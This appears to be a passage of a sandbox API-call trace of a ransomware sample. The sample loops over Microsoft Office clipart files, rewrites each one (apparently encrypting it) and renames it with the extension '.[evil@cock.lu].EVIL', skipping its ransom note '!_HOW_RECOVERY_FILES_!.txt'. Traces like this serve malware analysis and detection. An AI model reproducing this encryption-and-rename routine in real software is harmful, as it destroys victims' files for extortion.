[0154.788] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF", dwFileAttributes=0x200) returned 0 [0154.789] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.789] wcsstr (_Str="J0301418.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.789] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF") returned 69 [0154.789] wcscmp (_String1="J0301418.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.789] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0301418.WMF") returned 0x0 [0154.789] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF") returned 0x45 [0154.789] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.791] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4a5a, lpOverlapped=0x0) returned 1 [0154.799] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.799] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.799] _errno () returned 0x84b1160840 [0154.799] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.799] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4a60, lpOverlapped=0x0) returned 1 [0154.800] CloseHandle (hObject=0x1a8) returned 1 [0154.800] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.800] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.800] __uncaught_exception () returned 0x84b1160800 [0154.800] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.800] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf.[evil@cock.lu].evil")) returned 1 [0154.801] ??_V@YAXPEAX@Z () returned 0x1 [0154.805] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF", dwFileAttributes=0x200) returned 0 [0154.805] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.805] wcsstr (_Str="J0301432.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.805] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF") returned 69 [0154.805] wcscmp (_String1="J0301432.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.805] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0301432.WMF") returned 0x0 [0154.805] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF") returned 0x45 [0154.805] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.807] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4dfa, lpOverlapped=0x0) returned 1 [0154.816] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.816] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.816] _errno () returned 0x84b1160840 [0154.816] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.816] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4e00, lpOverlapped=0x0) returned 1 [0154.816] CloseHandle (hObject=0x1a8) returned 1 [0154.817] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.817] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.817] __uncaught_exception () returned 0x84b1160800 [0154.817] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.817] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf.[evil@cock.lu].evil")) returned 1 [0154.818] ??_V@YAXPEAX@Z () returned 0x1 [0154.821] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF", dwFileAttributes=0x200) returned 0 [0154.822] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.822] wcsstr (_Str="J0304371.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.822] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF") returned 69 [0154.822] wcscmp (_String1="J0304371.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.822] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0304371.WMF") returned 0x0 [0154.822] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF") returned 0x45 [0154.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.824] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0154.833] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.833] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.833] _errno () returned 0x84b1160840 [0154.833] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.833] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe40, lpOverlapped=0x0) returned 1 [0154.833] CloseHandle (hObject=0x1a8) returned 1 [0154.833] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.834] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.834] __uncaught_exception () returned 0x84b1160800 [0154.834] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.834] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf.[evil@cock.lu].evil")) returned 1 [0154.835] ??_V@YAXPEAX@Z () returned 0x1 [0154.838] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF", dwFileAttributes=0x200) returned 0 [0154.839] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.839] wcsstr (_Str="J0304405.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.839] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF") returned 69 [0154.839] wcscmp (_String1="J0304405.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.839] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0304405.WMF") returned 0x0 [0154.839] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF") returned 0x45 [0154.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.841] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x103e, lpOverlapped=0x0) returned 1 [0154.849] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.849] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.849] _errno () returned 0x84b1160840 [0154.849] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.849] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1040, lpOverlapped=0x0) returned 1 [0154.849] CloseHandle (hObject=0x1a8) returned 1 [0154.849] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.850] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.850] __uncaught_exception () returned 0x84b1160800 [0154.850] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.850] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf.[evil@cock.lu].evil")) returned 1 [0154.851] ??_V@YAXPEAX@Z () returned 0x1 [0154.853] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF", dwFileAttributes=0x200) returned 0 [0154.854] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.854] wcsstr (_Str="J0304853.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.854] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF") returned 69 [0154.854] wcscmp (_String1="J0304853.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.854] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0304853.WMF") returned 0x0 [0154.854] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF") returned 0x45 [0154.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.856] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4a0e, lpOverlapped=0x0) returned 1 [0154.864] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.864] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.864] _errno () returned 0x84b1160840 [0154.864] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.864] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x4a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4a20, lpOverlapped=0x0) returned 1 [0154.864] CloseHandle (hObject=0x1a8) returned 1 [0154.864] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.865] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.865] __uncaught_exception () returned 0x84b1160800 [0154.865] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.865] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf.[evil@cock.lu].evil")) returned 1 [0154.866] ??_V@YAXPEAX@Z () returned 0x1 [0154.869] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF", dwFileAttributes=0x200) returned 0 [0154.869] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.869] wcsstr (_Str="J0304861.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.869] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF") returned 69 [0154.869] wcscmp (_String1="J0304861.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.869] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0304861.WMF") returned 0x0 [0154.869] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF") returned 0x45 [0154.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.908] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2cf8, lpOverlapped=0x0) returned 1 [0154.921] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.921] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.921] _errno () returned 0x84b1160840 [0154.921] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.921] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d00, lpOverlapped=0x0) returned 1 [0154.921] CloseHandle (hObject=0x1a8) returned 1 [0154.921] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.922] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.922] __uncaught_exception () returned 0x84b1160800 [0154.922] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.922] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf.[evil@cock.lu].evil")) returned 1 [0154.949] ??_V@YAXPEAX@Z () returned 0x1 [0154.953] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF", dwFileAttributes=0x200) returned 0 [0154.953] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.953] wcsstr (_Str="J0304875.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.953] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF") returned 69 [0154.953] wcscmp (_String1="J0304875.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.953] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0304875.WMF") returned 0x0 [0154.953] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF") returned 0x45 [0154.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.956] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f8e, lpOverlapped=0x0) returned 1 [0154.961] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.961] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.961] _errno () returned 0x84b1160840 [0154.961] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.961] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4fa0, lpOverlapped=0x0) returned 1 [0154.961] CloseHandle (hObject=0x1a8) returned 1 [0154.961] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.961] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.961] __uncaught_exception () returned 0x84b1160800 [0154.962] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.962] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf.[evil@cock.lu].evil")) returned 1 [0154.963] ??_V@YAXPEAX@Z () returned 0x1 [0154.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF", dwFileAttributes=0x200) returned 0 [0154.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.967] wcsstr (_Str="J0309480.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG") returned 69 [0154.967] wcscmp (_String1="J0309480.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0309480.JPG") returned 0x0 [0154.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG") returned 0x45 [0154.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.969] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x29c4, lpOverlapped=0x0) returned 1 [0154.978] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.978] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.978] _errno () returned 0x84b1160840 [0154.978] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.978] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x29e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x29e0, lpOverlapped=0x0) returned 1 [0154.978] CloseHandle (hObject=0x1a8) returned 1 [0154.978] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.979] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.979] __uncaught_exception () returned 0x84b1160800 [0154.979] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.979] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg.[evil@cock.lu].evil")) returned 1 [0154.980] ??_V@YAXPEAX@Z () returned 0x1 [0154.984] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG", dwFileAttributes=0x200) returned 0 [0154.984] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.984] wcsstr (_Str="J0309567.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.984] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG") returned 69 [0154.984] wcscmp 